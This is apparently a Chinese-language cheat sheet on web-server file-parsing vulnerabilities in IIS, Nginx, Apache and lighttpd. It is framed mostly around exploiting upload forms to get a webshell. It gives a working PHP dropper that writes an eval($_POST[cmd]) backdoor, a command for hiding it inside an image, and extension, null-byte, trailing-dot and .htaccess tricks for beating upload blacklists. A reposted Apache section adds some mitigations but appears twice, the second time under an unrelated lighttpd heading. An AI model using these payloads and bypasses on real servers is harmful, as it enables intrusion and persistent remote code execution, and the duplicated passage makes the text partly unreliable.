[+]IIS 6.0

目錄解析：/xx.asp/xx.jpg  xx.jpg可替換為任意文字檔案(e.g. xx.txt)，文字內容為後門程式碼

IIS6.0 會將 xx.jpg 解析為 asp 檔案。

字尾解析：/xx.asp;.jpg     /xx.asp:.jpg(此處需抓包修改檔名)

IIS6.0 都會把此類字尾檔案成功解析為 asp 檔案。

（IIS6.0解析漏洞的成因，可以查閱羅哥寫的一篇短文：IIS檔名解析漏洞扼要分析）

{/xx.asp:.jpg 此類檔案在Windows下不允許存在，:.jpg被自動除去，剩下/xx.asp}

（發現錯誤，並不是不允許存在，這種路徑叫做“NTFS資料流”，具體見：IIS6使用冒號上傳漏洞，發現IIS6漏洞(上傳利用) 底下的評論）

預設解析：/xx.asa    /xx.cer   /xx.cdx

IIS6.0 預設的可執行檔案除了 asp 還包含這三種

（這種主要是由於在 IIS 預設配置中，這幾個字尾預設由 asp.dll 來解析，所以執行許可權和 .asp 一摸一樣，你可在配置中自行刪除該字尾，以防止安全隱患）

此處可聯絡利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

[+]IIS 7.0/IIS 7.5/Nginx <=0.8.37

IIS 7.0/IIS 7.5/Nginx <=0.8.37

在預設Fast-CGI開啟狀況下,在一個檔案路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析為 php 檔案。

常用利用方法： 將一張圖和一個寫入後門程式碼的文字檔案合併 將惡意文字寫入圖片的二進位制程式碼之後，避免破壞圖片檔案頭和尾

e.g.  copy xx.jpg/b + yy.txt/a xy.jpg

######################################

/b 即二進位制[binary]模式

/a 即ascii模式 xx.jpg正常圖片檔案

yy.txt 內容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

意思為寫入一個內容為 <?php eval($_POST[cmd])?> 名稱為shell.php的檔案

######################################

找個地方上傳 xy.jpg ,然後找到 xy.jpg 的地址，在地址後加上 /xx.php 即可執行惡意文字。

然後就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd

[+]Nginx <=0.8.37

在Fast-CGI關閉的情況下，Nginx <=0.8.37 依然存在解析漏洞

在一個檔案路徑(/xx.jpg)後面加上%00.php會將 /xx.jpg%00.php 解析為 php 檔案。

（站長評論：從 /test.jpg/x.php 演變過來的，具體可以參考：Ngnix 空位元組可遠端執行程式碼漏洞）

[+]Apache

字尾解析：test.php.x1.x2.x3

Apache將從右至左開始判斷後綴，若x3非可識別字尾，再判斷x2，直到找到可識別字尾為止，然後將該可識別字尾進解析

test.php.x1.x2.x3 則會被解析為php

經驗之談：php|php3|phtml 多可被Apache解析

（關於 apache 解析漏洞可以查閱“Apache 漏洞之後綴名解析漏洞”）

Apache解析漏洞詳解（文章轉自milantgh窗含西嶺千秋雪大佬的部落格）

很多次聽到人說apache的“解析漏洞”了，正好今天又有人問，那就簡單科普一下這個“解析漏洞”是何物。

先來看測試過程和結果的對比吧。

結果一

首先，我安裝了apache 2.x版本，同時以module方式使apache與php結合，測試發現確實存在這樣的解析漏洞。

結果二

然後，我將apache與php的結合方式修改為fastcgi方式，測試發現爆500錯誤，不存在這樣的解析漏洞。

錯誤提示：

1Bad file descriptor: mod_fcgid: don't know how to spawn child process: f4ck.php.x

意思就是不知道該如何解析這個檔案。

結果出來了，那麼對於影響範圍這塊，在目前所有的apache版本中均存在此問題，但只適用於以module方式解析php的apache，使用fastcgi方式解析php的apache不受影響，使用cgi方式解析php的apache是否影響未測試。

下面來簡單分享一下測試過程中我發現的一點經驗。

先來看一下apache的主配置檔案httpd.conf，搜尋“DefaultType”，就可以看到這麼一段註釋和預設配置：

#
# DefaultType: the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#10DefaultType text/plain

DefaultType存在的意義是告訴apache該如何處理未知副檔名的檔案，比如f4ck.xxx這樣的檔案，副檔名是xxx，這肯定不是一個正常的網頁或指令碼檔案，這個引數就是告訴apache該怎麼處理這種未知副檔名的檔案。

引數DefaultType的預設值是“text/plain”，也就是遇到未知副檔名的檔案，就把它當作普通的txt文字或html檔案來處理。

測試一

比如我將以下程式碼儲存為f4ck.xxx：

1F4ckTeam apache test

訪問它，按照預設的apache配置，這個檔案是會被瀏覽器顯示出來具體效果的：

這是對於檔案內容為HTML程式碼的未知副檔名檔案來說，檔案中的HTML程式碼會被瀏覽器執行。

測試二

那麼，對於檔案內容為php程式碼的未知副檔名檔案來說，這些php程式碼會被解析嗎?

來看測試結果：

可以看到，這裡包含php程式碼的未知副檔名的檔案被當作txt文件處理了。

但是，如果將檔名改為f4ck.php.xxx，那麼就會被以module方式執行php的apache解析，為什麼?

因為Apache認為一個檔案可以擁有多個副檔名，哪怕沒有檔名，也可以擁有多個副檔名。Apache認為應該從右到左開始判斷解析方法的。如果最右側的副檔名為不可識別的，就繼續往左判斷，直到判斷到檔名為止。

官方解釋見：http://httpd.apache.org/docs/current/mod/directive-dict.html，搜尋“extension”即可看到。

摘錄官方解釋：

extension

In general, this is the part of the filename which follows the last dot. However, Apache recognizes multiple filename extensions, so if a filename contains more than one dot, each dot-separated part of the filename following the first dot is an extension. For example, the filename file.html.en contains two extensions: .html and .en. For Apache directives, you may specify extensions with or without the leading dot. In addition, extensions are not case sensitive.

那麼，對於“測試一”和“測試二”來說，apache發現這個檔案的副檔名是未知的，那麼它會先看在副檔名之前是否有其他的可識別的副檔名，但是該 案例中的完整檔名為“f4ck.xxxx”，在副檔名“xxxx”之前沒有其他的可識別副檔名了，所以apache就按照httpd.conf中引數 DefaultType的值來決定該檔案的處理方式，即作為txt文件處理。

同樣的，對於“結果一”和“結果二”來說，也是按照這樣的方式來逐步確定未知副檔名檔案的解析方式，首先apache發現這個檔案的副檔名是未知 的，那麼它會先看在副檔名之前是否有其他的可識別的副檔名，在該案例中的完整檔名為“f4ck.php.x”，那麼apache就發現在未知副檔名 “x”之前有一個可識別的副檔名是“php”，那麼apache就會認為這是一個php檔案，就會把這個檔案按照解析php檔案的方式來解析。

說到這裡，就不得不提一下，apache對於副檔名的定義都是寫在conf/mime.types檔案中的，看一下圖：

檔案mime.types定義了apache處理不同副檔名檔案的方法，檔案httpd.conf中引數DefaultType的值定義了apache處理未知副檔名檔案的方法。

另外，檔案httpd.conf中語句塊“”中可以用“AddType”語句來定義apache解析不同副檔名檔案的方法。

處理和解析是完全不同的概念，這就好像對於apache+php結合的網站來說，apache是應用伺服器，php是中介軟體，apache只負責接 收/響應HTTP請求，php卻負責.php檔案的解釋執行。Php將.php檔案解釋執行完畢後，將生成的HTML程式碼傳送給apache，再由 apache將HTML程式碼傳送給客戶端。

另外說一下，副檔名rar並沒有在檔案mime.types中出現，所以如果遇到可以上傳rar檔案且與php的結合方式為module方式的apache，則可以直接上傳類似“f4ck.php.rar”的檔案來獲得webshell。

解決方案一

在httpd.conf或httpd-vhosts.conf中加入以下語句，從而禁止檔名格式為*.php.*的訪問許可權：

<FilesMatch ".(php.|php3.|php4.|php5.)">
Order Deny,Allow
Deny from all
</FilesMatch>

解決方案二

如果需要保留檔名，可以修改程式原始碼，替換上傳檔名中的“.”為“_”：

$filename = str_replace('.', '_', $filename);

如果不需要保留檔名，可以修改程式原始碼，將上傳檔名重新命名為時間戳+隨機數的格式。

總結：網上說的“低版本的apache存在未知副檔名解析漏洞”的說法是錯誤的，正確的說法應該是使用module模式與php結合的所有版本 apache存在未知副檔名解析漏洞，使用fastcig模式與php結合的所有版本apache不存在此漏洞。並且，想利用此漏洞必須保證副檔名中 至少帶有一個“.php”，否則將預設被作為txt/html文件處理。

[+]其他一些可利用的

在windows環境下，xx.jpg[空格] 或xx.jpg. 這兩類檔案都是不允許存在的，若這樣命名，windows會預設除去空格或點，這也是可以被利用的！

在向一臺windows主機上傳資料時，你可以抓包修改檔名，在後面加個空格或點，試圖繞過黑名單，若上傳成功，最後的點或空格都會被消除，這樣就可得到shell。

我記得Fck Php 2.6就存在加空格繞過的漏洞。{Linux主機中不行，Linux允許這類檔案存在}

如果在Apache中.htaccess可被應用（Apache的配置檔案httpd.conf中對目錄的AllowOverride設定為All時，apache會應用目錄下.htaccess中的配置 By sfasfas），

且可以被上傳，那可以嘗試在.htaccess中寫入:

<FilesMatch “shell.jpg”> SetHandler application/x-httpd-php </FilesMatch>

shell.jpg換成你上傳的檔案，這樣shell.jpg就可解析為php檔案

[+]lighttpd

xx.jpg/xx.php

很多次聽到人說apache的“解析漏洞”了，正好今天又有人問，那就簡單科普一下這個“解析漏洞”是何物。

先來看測試過程和結果的對比吧。

結果一

首先，我安裝了apache 2.x版本，同時以module方式使apache與php結合，測試發現確實存在這樣的解析漏洞。

結果二

然後，我將apache與php的結合方式修改為fastcgi方式，測試發現爆500錯誤，不存在這樣的解析漏洞。

錯誤提示：

1Bad file descriptor: mod_fcgid: don't know how to spawn child process: f4ck.php.x

意思就是不知道該如何解析這個檔案。

結果出來了，那麼對於影響範圍這塊，在目前所有的apache版本中均存在此問題，但只適用於以module方式解析php的apache，使用fastcgi方式解析php的apache不受影響，使用cgi方式解析php的apache是否影響未測試。

下面來簡單分享一下測試過程中我發現的一點經驗。

先來看一下apache的主配置檔案httpd.conf，搜尋“DefaultType”，就可以看到這麼一段註釋和預設配置：

#
# DefaultType: the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#10DefaultType text/plain

DefaultType存在的意義是告訴apache該如何處理未知副檔名的檔案，比如f4ck.xxx這樣的檔案，副檔名是xxx，這肯定不是一個正常的網頁或指令碼檔案，這個引數就是告訴apache該怎麼處理這種未知副檔名的檔案。

引數DefaultType的預設值是“text/plain”，也就是遇到未知副檔名的檔案，就把它當作普通的txt文字或html檔案來處理。

測試一

比如我將以下程式碼儲存為f4ck.xxx：

1F4ckTeam apache test

訪問它，按照預設的apache配置，這個檔案是會被瀏覽器顯示出來具體效果的：

這是對於檔案內容為HTML程式碼的未知副檔名檔案來說，檔案中的HTML程式碼會被瀏覽器執行。

測試二

那麼，對於檔案內容為php程式碼的未知副檔名檔案來說，這些php程式碼會被解析嗎?

來看測試結果：

可以看到，這裡包含php程式碼的未知副檔名的檔案被當作txt文件處理了。

但是，如果將檔名改為f4ck.php.xxx，那麼就會被以module方式執行php的apache解析，為什麼?

因為Apache認為一個檔案可以擁有多個副檔名，哪怕沒有檔名，也可以擁有多個副檔名。Apache認為應該從右到左開始判斷解析方法的。如果最右側的副檔名為不可識別的，就繼續往左判斷，直到判斷到檔名為止。

官方解釋見：http://httpd.apache.org/docs/current/mod/directive-dict.html，搜尋“extension”即可看到。

摘錄官方解釋：

extension

In general, this is the part of the filename which follows the last dot. However, Apache recognizes multiple filename extensions, so if a filename contains more than one dot, each dot-separated part of the filename following the first dot is an extension. For example, the filename file.html.en contains two extensions: .html and .en. For Apache directives, you may specify extensions with or without the leading dot. In addition, extensions are not case sensitive.

那麼，對於“測試一”和“測試二”來說，apache發現這個檔案的副檔名是未知的，那麼它會先看在副檔名之前是否有其他的可識別的副檔名，但是該 案例中的完整檔名為“f4ck.xxxx”，在副檔名“xxxx”之前沒有其他的可識別副檔名了，所以apache就按照httpd.conf中引數 DefaultType的值來決定該檔案的處理方式，即作為txt文件處理。

同樣的，對於“結果一”和“結果二”來說，也是按照這樣的方式來逐步確定未知副檔名檔案的解析方式，首先apache發現這個檔案的副檔名是未知 的，那麼它會先看在副檔名之前是否有其他的可識別的副檔名，在該案例中的完整檔名為“f4ck.php.x”，那麼apache就發現在未知副檔名 “x”之前有一個可識別的副檔名是“php”，那麼apache就會認為這是一個php檔案，就會把這個檔案按照解析php檔案的方式來解析。

說到這裡，就不得不提一下，apache對於副檔名的定義都是寫在conf/mime.types檔案中的，看一下圖：

檔案mime.types定義了apache處理不同副檔名檔案的方法，檔案httpd.conf中引數DefaultType的值定義了apache處理未知副檔名檔案的方法。

另外，檔案httpd.conf中語句塊“”中可以用“AddType”語句來定義apache解析不同副檔名檔案的方法。

處理和解析是完全不同的概念，這就好像對於apache+php結合的網站來說，apache是應用伺服器，php是中介軟體，apache只負責接 收/響應HTTP請求，php卻負責.php檔案的解釋執行。Php將.php檔案解釋執行完畢後，將生成的HTML程式碼傳送給apache，再由 apache將HTML程式碼傳送給客戶端。

另外說一下，副檔名rar並沒有在檔案mime.types中出現，所以如果遇到可以上傳rar檔案且與php的結合方式為module方式的apache，則可以直接上傳類似“f4ck.php.rar”的檔案來獲得webshell。

解決方案一

在httpd.conf或httpd-vhosts.conf中加入以下語句，從而禁止檔名格式為*.php.*的訪問許可權：

<FilesMatch ".(php.|php3.|php4.|php5.)">
Order Deny,Allow
Deny from all
</FilesMatch>

解決方案二

如果需要保留檔名，可以修改程式原始碼，替換上傳檔名中的“.”為“_”：

$filename = str_replace('.', '_', $filename);

如果不需要保留檔名，可以修改程式原始碼，將上傳檔名重新命名為時間戳+隨機數的格式。

總結：網上說的“低版本的apache存在未知副檔名解析漏洞”的說法是錯誤的，正確的說法應該是使用module模式與php結合的所有版本 apache存在未知副檔名解析漏洞，使用fastcig模式與php結合的所有版本apache不存在此漏洞。並且，想利用此漏洞必須保證副檔名中 至少帶有一個“.php”，否則將預設被作為txt/html文件處理。